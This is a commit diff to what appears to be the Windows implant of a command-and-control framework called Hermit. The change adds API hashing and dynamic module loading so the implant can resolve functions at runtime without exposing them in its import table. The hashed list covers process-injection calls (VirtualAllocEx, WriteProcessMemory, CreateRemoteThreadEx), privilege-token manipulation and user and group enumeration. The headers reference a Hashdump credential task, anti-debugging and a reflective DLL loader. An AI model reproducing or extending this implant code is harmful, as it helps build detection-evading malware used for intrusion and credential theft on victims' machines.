implemented dynamic module loading for implant

payload/win/implant/CMakeLists.txt

@@ -125,6 +125,7 @@ set(SOURCE_CORE
         src/core/utils/convert.cpp
         src/core/utils/random.cpp
         src/core/utils/split.cpp
+        src/core/utils/strings.cpp
 )
 
 if(${PAYLOAD_TYPE} STREQUAL \"beacon\")
@@ -144,7 +145,7 @@ if(${PAYLOAD_TYPE} STREQUAL \"beacon\")
 endif()
 
 # LINK LIBRATILIES
-link_libraries(bcrypt crypt32 dbghelp gdi32 gdiplus iphlpapi netapi32 ntdll psapi winhttp wsock32 ws2_32)
+link_libraries(bcrypt dbghelp gdi32 gdiplus iphlpapi netapi32 psapi wsock32 ws2_32)
 
 # ADD
 if(${PAYLOAD_FORMAT} STREQUAL "dll")

payload/win/implant/include/core/crypt.hpp

@@ -1,12 +1,11 @@
 #ifndef HERMIT_CORE_CRYPT_HPP
 #define HERMIT_CORE_CRYPT_HPP
 
+#include "core/procs.hpp"
 #include "core/stdout.hpp"
 #include "core/utils.hpp"
 
 #include <windows.h>
-#include <wincrypt.h>
-#include <bcrypt.h>
 #include <iomanip>
 #include <ntstatus.h>
 #include <string>
@@ -36,24 +35,31 @@ namespace Crypt
     };
     typedef CRYPT* PCRYPT;
 
-    std::wstring Base64Encode(const std::vector<BYTE>& data);
-    std::vector<BYTE> Base64Decode(const std::wstring& w64);
+    std::wstring Base64Encode(Procs::PPROCS pProcs, const std::vector<BYTE>& data);
+    std::vector<BYTE> Base64Decode(Procs::PPROCS pProcs, const std::wstring& w64);
 
     std::vector<BYTE> PadPKCS7(const std::vector<BYTE>& data, DWORD cbBlockLen);
     std::vector<BYTE> UnpadPKCS7(const std::vector<BYTE>& data, DWORD dwPadLen);
 
-    PCRYPT InitCrypt(const std::wstring& wKey64, const std::wstring& wIV64);
+    PCRYPT InitCrypt(
+        Procs::PPROCS pProcs,
+        const std::wstring& wKey64,
+        const std::wstring& wIV64
+    );
     std::wstring Encrypt(
+        Procs::PPROCS pProcs,
         const std::vector<BYTE> plaindata,
         BCRYPT_KEY_HANDLE hKey,
         std::vector<BYTE> iv
     );
     std::vector<BYTE> Decrypt(
+        Procs::PPROCS pProcs,
         const std::wstring& ciphertext,
         BCRYPT_KEY_HANDLE hKey,
         std::vector<BYTE> iv
     );
     VOID Cleanup(
+        Procs::PPROCS pProcs,
         BCRYPT_ALG_HANDLE hAlg,
         BCRYPT_KEY_HANDLE hKey,
         PBYTE pbKeyObj

payload/win/implant/include/core/macros.hpp

@@ -93,5 +93,4 @@
 #define AES_IV_BASE64_W WIDEN(AES_IV_BASE64)
 #endif
 
-
 #endif // HERMIT_CORE_MACROS_HPP

payload/win/implant/include/core/state.hpp

@@ -25,7 +25,11 @@ namespace State
         PTEB                pTeb;
 
         // Module handlers
+        HMODULE             hAdvapi32DLL;
+        HMODULE             hBcryptDLL;
+        HMODULE             hCrypt32DLL;
         HMODULE             hKernel32DLL;
+        HMODULE             hNetapi32DLL;
         HMODULE             hNTDLL;
         HMODULE             hWinHTTPDLL;
 

payload/win/implant/include/core/system.hpp

@@ -8,7 +8,7 @@
 #include "core/utils.hpp"
 
 #include <windows.h>
-#include <winhttp.h>
+// #include <winhttp.h>
 #include <winreg.h>
 #include <fstream>
 #include <lm.h>
@@ -44,14 +44,14 @@ namespace System::Env
 
 namespace System::Group
 {
-    std::vector<std::wstring> AllGroupsGet();
+    std::vector<std::wstring> AllGroupsGet(Procs::PPROCS pProcs);
 }
 
 namespace System::User
 {
     std::wstring ComputerNameGet(Procs::PPROCS pProcs);
     std::wstring UserNameGet(Procs::PPROCS pProcs);
-    std::vector<std::wstring> AllUsersGet();
+    std::vector<std::wstring> AllUsersGet(Procs::PPROCS pProcs);
 }
 
 namespace System::Priv
@@ -287,6 +287,7 @@ namespace System::Registry
         const std::wstring& wRootKey
     );
     std::vector<std::wstring> RegEnumSubKeys(
+        Procs::PPROCS       pProcs,
         HKEY                hRootKey,
         const std::wstring& wSubKey,
         DWORD               dwOptions,

payload/win/implant/include/core/task.hpp

@@ -4,6 +4,7 @@
 #include <winsock2.h>
 
 #include "core/macros.hpp"
+#include "core/win32.hpp"
 #include "core/state.hpp"
 #include "core/stdout.hpp"
 #include "core/system.hpp"
@@ -12,8 +13,6 @@
 
 #include <ws2tcpip.h>
 #include <windows.h>
-#include <winhttp.h>
-#include <winreg.h>
 #include <dbghelp.h>
 #include <gdiplus.h>
 #include <iphlpapi.h>
@@ -141,7 +140,7 @@ namespace Task
     std::wstring Download(State::PSTATE pState, const std::wstring& wSrc, const std::wstring& wDest);
     std::wstring EnvLs(State::PSTATE pState);
     std::wstring Find(State::PSTATE pState, const std::wstring& wPath, const std::wstring& wName);
-    std::wstring GroupLs();
+    std::wstring GroupLs(State::PSTATE pState);
     std::wstring Hashdump(State::PSTATE pState);
     std::wstring History(State::PSTATE pState);
     std::wstring Ip();

payload/win/implant/include/core/technique.hpp

@@ -8,7 +8,6 @@
 #include <windows.h>
 #include <vector>
 
-typedef ULONG_PTR (WINAPI * LPPROC_REFLECTIVEDLLLOADER)();
 typedef BOOL (WINAPI * DLLMAIN)(HINSTANCE, DWORD, LPVOID);
 
 // Used for Anti-Debug

payload/win/implant/include/core/utils.hpp

@@ -46,4 +46,10 @@ namespace Utils::Split
     std::vector<std::wstring> Split(std::wstring text, wchar_t delimiter);
 }
 
+namespace Utils::Strings
+{
+    SIZE_T StrLenA(LPCSTR str);
+    SIZE_T StrLenW(LPCWSTR str);
+}
+
 #endif // HERMIT_CORE_UTILS_HPP

payload/win/implant/include/core/win32.hpp

@@ -0,0 +1,6 @@
+#ifndef HERMIT_CORE_WIN32_HPP
+#define HERMIT_CORE_WIN32_HPP
+
+typedef DWORD NET_API_STATUS;
+
+#endif // HERMIT_CORE_WIN32_HPP

payload/win/implant/include/rfl.hpp

@@ -5,7 +5,6 @@
 
 #include <windows.h>
 
-typedef ULONG_PTR (WINAPI * REFLECTIVEDLLLOADER)();
 typedef BOOL (WINAPI * DLLMAIN)(HINSTANCE, DWORD, LPVOID);
 
 extern "C" LPVOID  ReflectiveCaller();

payload/win/implant/script/calc_hash_func.py

@@ -1,7 +1,7 @@
 from typing import Mapping
 
 FUNCS = [
-    # NATIVE APIS
+    # NTAPI
     "LdrLoadDll",
     "NtAdjustPrivilegesToken",
     "NtAllocateVirtualMemory",
@@ -52,23 +52,69 @@
     "RtlStringCchLengthW",
     "RtlZeroMemory",
 
-    # WINAPIS
+    # WINAPI
+    "AdjustTokenPrivileges",
+    "BCryptCloseAlgorithmProvider",
+    "BCryptDecrypt",
+    "BCryptDestroyKey",
+    "BCryptEncrypt",
+    "BCryptGenerateSymmetricKey",
+    "BCryptGetProperty",
+    "BCryptOpenAlgorithmProvider",
+    "BCryptSetProperty",
     "CheckRemoteDebuggerPresent",
     "CloseHandle",
+    "CreateFileW",
+    "CreatePipe",
+    "CreateProcessW",
+    "CreateRemoteThreadEx",
     "CreateThreadpoolWait",
+    "CryptBinaryToStringW",
+    "CryptStringToBinaryW",
     "DllMain",
+    "ExpandEnvironmentStringsW",
+    "FindFirstFileW",
+    "FindNextFileW",
+    "FreeEnvironmentStringsW",
+    "GetComputerNameW",
+    "GetEnvironmentStringsW",
+    "GetLastError",
+    "GetModuleFileNameW",
     "GetProcAddress",
+    "GetProcessHeap",
+    "GetSystemDirectoryW",
+    "GetUserNameW",
+    "HeapAlloc",
+    "HeapFree",
     "IsDebuggerPresent",
     "LoadLibraryA",
     "LoadLibraryW",
+    "LookupPrivilegeValueW",
     "MessageBoxA",
     "MessageBoxW",
+    "NetApiBufferFree",
+    "NetLocalGroupEnum",
+    "NetUserEnum",
+    "OpenProcess",
+    "OpenProcessToken",
+    "PrivilegeCheck",
     "QueryFullProcessImageNameW",
+    "ReadFile",
+    "ReadProcessMemory",
+    "RegCloseKey",
+    "RegEnumKeyExW",
+    "RegOpenKeyExW",
+    "RegQueryInfoKeyW",
     "RtlAddFunctionTable",
+    "RtlCopyMemory",
     "SetFileInformationByHandle",
+    "SetHandleInformation",
     "SetThreadpoolWait",
+    "TerminateProcess",
     "VirtualAlloc",
+    "VirtualAllocEx",
     "VirtualProtect",
+    "VirtualProtectEx",
     "VirtualFree",
     "WinHttpCloseHandle",
     "WinHttpConnect",
@@ -81,6 +127,7 @@
     "WinHttpSendRequest",
     "WinHttpSetOption",
     "WinHttpWriteData",
+    "WriteProcessMemory",
 ]
 
 HASH_IV = 0x35
@@ -111,7 +158,7 @@ def main():
         hash_fmt = f"{'0x{0:x}'.format(hash_value)}"
         # Check if the hash is duplicate
         if is_dupl(hashes, hash_fmt) is True:
-            print("The calculated hash is duplicate. Please try again.")
+            print("The calculated hash is duplicate. Please update algorithm.")
             return
         hashes[f"#define HASH_FUNC_{func.upper()}"] = hash_fmt
 

payload/win/implant/script/calc_hash_module.cpp

@@ -40,9 +40,17 @@ int main()
 {
     std::map<std::string, unsigned long> myMap;
 
-    char modules[2][30] = {"kernel32.dll", "ntdll.dll"};
+    char modules[7][30] = {
+        "bcrypt.dll",
+        "crypt32.dll",
+        "kernel32.dll",
+        "netapi32.dll",
+        "ntdll.dll",
+        "user32.dll",
+        "winhttp.dll",
+    };
 
-    for (int i = 0; i < 2; i++)
+    for (int i = 0; i < 7; i++)
     {
         char* moduleUpper = toUpper(modules[i]);